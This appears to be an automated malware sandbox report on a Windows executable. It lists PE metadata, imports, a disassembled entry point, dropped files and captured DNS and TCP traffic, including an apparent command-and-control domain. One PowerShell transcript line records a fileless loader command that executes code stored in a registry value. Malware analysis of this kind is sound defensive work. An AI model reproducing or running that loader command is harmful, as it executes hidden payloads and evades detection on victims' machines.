"<STYLE NONCE" \| 1..23-11-2021 21:01:46 \| "#MBR-CSS-CHECK {" \| 1..23-11-2021 21:01:46 \| "DISPLAY: INLINE;" \| 1..23-11-2021 21:01:46 \| "}"

C:\Users\user\Documents\20211123\PowerShell_transcript.721680.W01rE_5a.20211123205931.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	5.325011715072354
Encrypted:	false
SSDEEP:	24:BxSAaxvBnRKx2DOXUWOLCHGI4qWPtHjeTKKjX4CIym1ZJX0OLCHGI4jGnxSAZLi:BZGvhQoORF4tPtqDYB1Z2F4cZZe
MD5:	64DCF29EFCD6A6F38728361169A5ED63
SHA1:	A5C6CB281423AE7E55D2DF225B55D5C8AFC5B01D
SHA-256:	CFC03A12FEF125CACE17B18C13EA4F53D578E9D05BF5CCCC67ADCF439FEA9A53
SHA-512:	E3FA3070041740AF06107B731596E629A17B96556943C13DA589BC3BDF0A9C6A4849BB089600027DBB4A52A1DF0E4EA3813FE385E615E0AF4340934C9633D213
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20211123205937..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 721680 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 4856..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20211123205937..******************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..******************

\Device\ConDrv Download File
Process:	C:\Windows\System32\nslookup.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	28
Entropy (8bit):	4.039148671903071
Encrypted:	false
SSDEEP:	3:U+6QlBxAN:U+7BW
MD5:	D796BA3AE0C072AA0E189083C7E8C308
SHA1:	ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
SHA-256:	EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
SHA-512:	BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
Malicious:	false
Preview:	Non-authoritative answer:...

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.870124121679364
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FpYf5EGDO9.exe
File size:	299520
MD5:	2f1743897afa6f586ae97f53bf55c14e
SHA1:	21a51f4a3fa0c65509a1c7ef640f7e6b779aee49
SHA256:	440c297bcaa0e4ca3d84281d524b8351ad1ea2b5aabb22795db824a356cd54bd
SHA512:	162fb9b7e4e18c7a6a3acfa24c284f23602337810e6de5126895673f481706ddeb09454737326bc6e5a834f1404ea48b8d6c0b0c3c199a4ea3c29c608450a667
SSDEEP:	6144:W8wgMcxaKnK1JVhXzHw9SXuZet0ySeznAySUQBs97Tp:W8hMszaPhDQ9SXuZet0ySezaUQB+/p
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0..#t..pt..pt..p..Up]..p..`pe..p..Tp...p}.mp...pt..pu..p..Qpu..p..dpu..p..cpu..pRicht..p........PE..L..."..`...................

File Icon


Icon Hash:	a2e8e8e8a2a2a488

Static PE Info

General
Entrypoint:	0x418140
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x60AFB322 [Thu May 27 14:56:34 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	6f82efd43bd3095537b2fbbd588fd6ad

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007F0694A54F5Bh
call 00007F0694A54C66h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0042FEC0h
push 0041C360h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF98h
push ebx
push esi
push edi
mov eax, dword ptr [00432064h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00401358h]
cmp dword ptr [01FB5ABCh], 00000000h
jne 00007F0694A54C60h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
call dword ptr [00401354h]
call 00007F0694A54DE3h
mov dword ptr [ebp-6Ch], eax
call 00007F0694A58DABh
test eax, eax
jne 00007F0694A54C5Ch
push 0000001Ch
call 00007F0694A54DA0h
add esp, 04h
call 00007F0694A58708h
test eax, eax
jne 00007F0694A54C5Ch
push 00000010h
call 00007F0694A54D8Dh
add esp, 04h
push 00000001h
call 00007F0694A58653h
add esp, 04h
call 00007F0694A5630Bh
mov dword ptr [ebp-04h], 00000000h
call 00007F0694A55EEFh
test eax, eax

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x304a4	0x78	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1bb7000	0x5470	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1bbd000	0x17e4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1440	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x17f70	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x3f8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x30cf6	0x30e00	False	0.609994405371	data	7.04723316599	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x32000	0x1b84ac0	0x1400	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1bb7000	0x5470	0x5600	False	0.609511264535	data	5.96212400018	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1bbd000	0x1155c	0x11600	False	0.0751039793165	data	0.975523484519	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
YONAMIKORUFENI	0x1bba700	0xee8	ASCII text, with very long lines, with no line terminators	Spanish	Paraguay
RT_CURSOR	0x1bbb5e8	0x8a8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Divehi; Dhivehi; Maldivian	Maldives
RT_ICON	0x1bb7330	0x8a8	data	Spanish	Paraguay
RT_ICON	0x1bb7bd8	0x6c8	data	Spanish	Paraguay
RT_ICON	0x1bb82a0	0x568	GLS_BINARY_LSB_FIRST	Spanish	Paraguay
RT_ICON	0x1bb8808	0x10a8	data	Spanish	Paraguay
RT_ICON	0x1bb98b0	0x988	data	Spanish	Paraguay
RT_ICON	0x1bba238	0x468	GLS_BINARY_LSB_FIRST	Spanish	Paraguay
RT_STRING	0x1bbbea8	0xfc	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x1bbbfa8	0x26c	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x1bbc218	0x254	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_CURSOR	0x1bbbe90	0x14	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_ICON	0x1bba6a0	0x5a	data	Spanish	Paraguay

Imports

DLL	Import
KERNEL32.dll	GetNumaNodeProcessorMask, SetCriticalSectionSpinCount, SearchPathW, SetInformationJobObject, lstrcmpA, FindFirstFileW, SetThreadContext, EnumCalendarInfoA, WriteConsoleInputW, IsBadStringPtrW, lstrlenA, EnumDateFormatsExW, CopyFileExW, GetNumaProcessorNode, TlsGetValue, SetLocalTime, UnmapViewOfFile, MoveFileExA, CommConfigDialogA, GetNumberOfConsoleInputEvents, GetConsoleAliasExesLengthA, SetErrorMode, FindResourceW, BuildCommDCBAndTimeoutsA, FreeLibrary, DeleteVolumeMountPointA, SetUnhandledExceptionFilter, LoadLibraryExW, SetDllDirectoryW, InterlockedIncrement, GetQueuedCompletionStatus, VerSetConditionMask, MoveFileExW, ReadConsoleA, InterlockedDecrement, WaitNamedPipeA, SetMailslotInfo, SetConsoleActiveScreenBuffer, WritePrivateProfileSectionA, SetDefaultCommConfigW, SetEnvironmentVariableW, CreateJobObjectW, SignalObjectAndWait, AddConsoleAliasW, GetComputerNameW, SetEvent, SetThreadExecutionState, OpenSemaphoreA, CreateHardLinkA, GetFileAttributesExA, _lclose, GetModuleHandleW, GetTickCount, GetCommConfig, GetProcessHeap, IsBadReadPtr, GetConsoleAliasesLengthA, GetSystemTimeAsFileTime, GetPrivateProfileStringW, GetConsoleTitleA, CreateRemoteThread, GetCompressedFileSizeW, EnumTimeFormatsA, SetCommTimeouts, CreateActCtxW, InitializeCriticalSection, GetProcessTimes, TlsSetValue, AllocateUserPhysicalPages, OpenProcess, FindResourceExA, GlobalAlloc, GetPrivateProfileIntA, LoadLibraryW, GetConsoleMode, FatalAppExitW, GetThreadSelectorEntry, AssignProcessToJobObject, GetCalendarInfoA, ReadFileScatter, SetSystemTimeAdjustment, SetVolumeMountPointA, ReadConsoleOutputW, SetConsoleCP, InterlockedPopEntrySList, LeaveCriticalSection, GetFileAttributesA, GlobalFlags, lstrcpynW, GetNamedPipeInfo, HeapValidate, GetVolumePathNamesForVolumeNameW, CreateSemaphoreA, SetConsoleCursorPosition, VerifyVersionInfoA, HeapQueryInformation, WritePrivateProfileSectionW, TerminateProcess, GetAtomNameW, FileTimeToSystemTime, UnregisterWait, lstrcatA, GetBinaryTypeW, CompareStringW, ExitThread, GetVolumePathNameA, lstrlenW, SetConsoleTitleA, WritePrivateProfileStringW, GlobalUnlock, VirtualUnlock, GetTempPathW, GetStringTypeExA, GetNamedPipeHandleStateW, GetLargestConsoleWindowSize, GetPrivateProfileIntW, InterlockedExchange, ReleaseActCtx, SetCurrentDirectoryA, GetStdHandle, FindFirstFileA, GetLastError, ChangeTimerQueueTimer, BackupRead, BindIoCompletionCallback, GetProcAddress, FindVolumeMountPointClose, GetLongPathNameA, VirtualAlloc, HeapSize, SetFirmwareEnvironmentVariableW, CreateNamedPipeA, CreateJobSet, LocalLock, LockFileEx, VerLanguageNameW, BuildCommDCBW, DefineDosDeviceA, FindClose, GetPrivateProfileStringA, LoadLibraryA, Process32FirstW, OpenMutexA, ProcessIdToSessionId, MoveFileA, GetExitCodeThread, GetNumberFormatW, SetFileApisToANSI, QueryDosDeviceW, SetConsoleWindowInfo, SetThreadIdealProcessor, HeapWalk, GetPrivateProfileStructA, GetTapeParameters, GetVolumePathNamesForVolumeNameA, GetModuleFileNameA, GetDefaultCommConfigA, FindNextFileA, WriteProfileStringA, WTSGetActiveConsoleSessionId, EnumDateFormatsA, WaitCommEvent, _lread, FindFirstChangeNotificationA, GetProcessShutdownParameters, QueueUserWorkItem, ContinueDebugEvent, IsDebuggerPresent, GetProcessAffinityMask, FatalExit, FreeEnvironmentStringsW, EnumResourceNamesA, WriteProfileStringW, EnumDateFormatsW, FatalAppExitA, PeekConsoleInputA, DeleteCriticalSection, WriteConsoleOutputAttribute, OutputDebugStringA, GetCPInfoExA, DuplicateHandle, FindFirstVolumeA, GetVersionExA, ReadConsoleInputW, TlsAlloc, TerminateJobObject, CloseHandle, GetVersion, DeleteTimerQueueTimer, GlobalAddAtomW, SetFileValidData, FindActCtxSectionStringW, ResetWriteWatch, UnregisterWaitEx, ReadConsoleOutputCharacterW, TlsFree, GetProfileSectionW, EnumSystemLocalesW, lstrcpyW, CreateFileW, SetStdHandle, GetPrivateProfileSectionNamesW, EnumResourceNamesW, GetThreadContext, GetModuleFileNameW, GetFullPathNameA, RaiseException, GetCommandLineW, HeapSetInformation, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, DecodePointer, ExitProcess, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, EncodePointer, SetLastError, HeapCreate, WriteFile, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, EnterCriticalSection, GetCurrentProcess, UnhandledExceptionFilter, HeapAlloc, HeapReAlloc, HeapFree, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, WriteConsoleW, OutputDebugStringW, IsProcessorFeaturePresent, SetFilePointer, GetConsoleCP, FlushFileBuffers
USER32.dll	GetMessageTime
GDI32.dll	GetBitmapBits
ADVAPI32.dll	InitiateSystemShutdownA, GetFileSecurityW
MSIMG32.dll	AlphaBlend

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Paraguay
Divehi; Dhivehi; Maldivian	Maldives

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2021 20:59:01.188534021 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:01.188596010 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.188694954 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:01.223388910 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:01.223433971 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.455176115 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.455302000 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:01.838922024 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:01.838963985 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.839232922 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.839298010 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:01.843496084 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:01.884892941 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.957516909 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.957607985 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:01.957634926 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.957654953 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.957710028 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:02.087204933 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:02.087254047 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:02.118227959 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.118277073 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.118367910 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.119088888 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.119108915 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.203983068 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.204166889 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.214313984 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.214344025 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.214649916 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.215068102 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.215991974 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.260881901 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.409250975 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.409365892 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.409385920 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.409440994 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.409447908 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.409502029 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.411650896 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.411673069 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:22.621581078 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.621613026 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.621711969 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.622286081 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.622297049 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.772825003 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.772947073 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.856421947 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.856455088 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.856741905 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.857845068 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.879123926 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.924865961 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.993434906 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.993472099 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.993495941 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.993606091 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.993624926 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.993719101 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.993722916 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.994304895 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.994342089 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.994436026 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.994445086 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.994494915 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.037786961 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.037815094 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.037983894 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.038005114 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.038053036 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.038547993 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.038567066 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.038649082 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.038657904 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.038696051 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.039382935 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.039403915 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.039828062 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.039836884 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.039922953 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.082202911 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.082228899 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.082324028 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.082344055 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.082391977 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.082488060 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.083184004 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.083205938 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.083281040 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.083292007 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.083317995 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.083340883 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.083847046 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.083867073 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.083940029 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.083956003 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.084034920 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.084302902 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.084321976 CET	443	49751	89.44.9.140	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2021 20:59:01.141908884 CET	60784	53	192.168.2.3	8.8.8.8
Nov 23, 2021 20:59:01.161288023 CET	53	60784	8.8.8.8	192.168.2.3
Nov 23, 2021 20:59:02.095560074 CET	51143	53	192.168.2.3	8.8.8.8
Nov 23, 2021 20:59:02.115087986 CET	53	51143	8.8.8.8	192.168.2.3
Nov 23, 2021 20:59:22.596138954 CET	49572	53	192.168.2.3	8.8.8.8
Nov 23, 2021 20:59:22.617527008 CET	53	49572	8.8.8.8	192.168.2.3
Nov 23, 2021 21:01:33.643055916 CET	53615	53	192.168.2.3	8.8.8.8
Nov 23, 2021 21:01:33.662415028 CET	53	53615	8.8.8.8	192.168.2.3
Nov 23, 2021 21:01:33.671132088 CET	53616	53	192.168.2.3	208.67.222.222
Nov 23, 2021 21:01:33.688481092 CET	53	53616	208.67.222.222	192.168.2.3
Nov 23, 2021 21:01:33.690542936 CET	53617	53	192.168.2.3	208.67.222.222
Nov 23, 2021 21:01:33.707777977 CET	53	53617	208.67.222.222	192.168.2.3
Nov 23, 2021 21:01:33.737785101 CET	53618	53	192.168.2.3	208.67.222.222
Nov 23, 2021 21:01:33.755074978 CET	53	53618	208.67.222.222	192.168.2.3
Nov 23, 2021 21:01:37.242913961 CET	50728	53	192.168.2.3	8.8.8.8
Nov 23, 2021 21:01:37.355216980 CET	53	50728	8.8.8.8	192.168.2.3
Nov 23, 2021 21:01:38.458543062 CET	53777	53	192.168.2.3	8.8.8.8
Nov 23, 2021 21:01:38.476181984 CET	53	53777	8.8.8.8	192.168.2.3
Nov 23, 2021 21:01:39.536601067 CET	57106	53	192.168.2.3	8.8.8.8
Nov 23, 2021 21:01:39.555768013 CET	53	57106	8.8.8.8	192.168.2.3
Nov 23, 2021 21:01:39.667114019 CET	60352	53	192.168.2.3	8.8.8.8
Nov 23, 2021 21:01:39.686436892 CET	53	60352	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 23, 2021 20:59:01.141908884 CET	192.168.2.3	8.8.8.8	0x6b3a	Standard query (0)	yahoo.com	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:02.095560074 CET	192.168.2.3	8.8.8.8	0xb3	Standard query (0)	www.yahoo.com	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:22.596138954 CET	192.168.2.3	8.8.8.8	0x4cb	Standard query (0)	soderunovos.website	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:33.643055916 CET	192.168.2.3	8.8.8.8	0x74e5	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:33.671132088 CET	192.168.2.3	208.67.222.222	0x1	Standard query (0)	222.222.67.208.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Nov 23, 2021 21:01:33.690542936 CET	192.168.2.3	208.67.222.222	0x2	Standard query (0)	myip.opendns.com	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:33.737785101 CET	192.168.2.3	208.67.222.222	0x3	Standard query (0)	myip.opendns.com	28	IN (0x0001)
Nov 23, 2021 21:01:37.242913961 CET	192.168.2.3	8.8.8.8	0x3485	Standard query (0)	lycos.com	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:38.458543062 CET	192.168.2.3	8.8.8.8	0xa124	Standard query (0)	www.lycos.com	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:39.536601067 CET	192.168.2.3	8.8.8.8	0xaadd	Standard query (0)	mail.yahoo.com	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:39.667114019 CET	192.168.2.3	8.8.8.8	0x4667	Standard query (0)	login.yahoo.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 23, 2021 20:59:01.161288023 CET	8.8.8.8	192.168.2.3	0x6b3a	No error (0)	yahoo.com		74.6.143.26	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:01.161288023 CET	8.8.8.8	192.168.2.3	0x6b3a	No error (0)	yahoo.com		98.137.11.163	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:01.161288023 CET	8.8.8.8	192.168.2.3	0x6b3a	No error (0)	yahoo.com		98.137.11.164	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:01.161288023 CET	8.8.8.8	192.168.2.3	0x6b3a	No error (0)	yahoo.com		74.6.143.25	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:01.161288023 CET	8.8.8.8	192.168.2.3	0x6b3a	No error (0)	yahoo.com		74.6.231.20	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:01.161288023 CET	8.8.8.8	192.168.2.3	0x6b3a	No error (0)	yahoo.com		74.6.231.21	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:02.115087986 CET	8.8.8.8	192.168.2.3	0xb3	No error (0)	www.yahoo.com	new-fp-shed.wg1.b.yahoo.com		CNAME (Canonical name)	IN (0x0001)
Nov 23, 2021 20:59:02.115087986 CET	8.8.8.8	192.168.2.3	0xb3	No error (0)	new-fp-shed.wg1.b.yahoo.com		87.248.100.216	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:02.115087986 CET	8.8.8.8	192.168.2.3	0xb3	No error (0)	new-fp-shed.wg1.b.yahoo.com		87.248.100.215	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:22.617527008 CET	8.8.8.8	192.168.2.3	0x4cb	No error (0)	soderunovos.website		89.44.9.140	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:33.662415028 CET	8.8.8.8	192.168.2.3	0x74e5	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
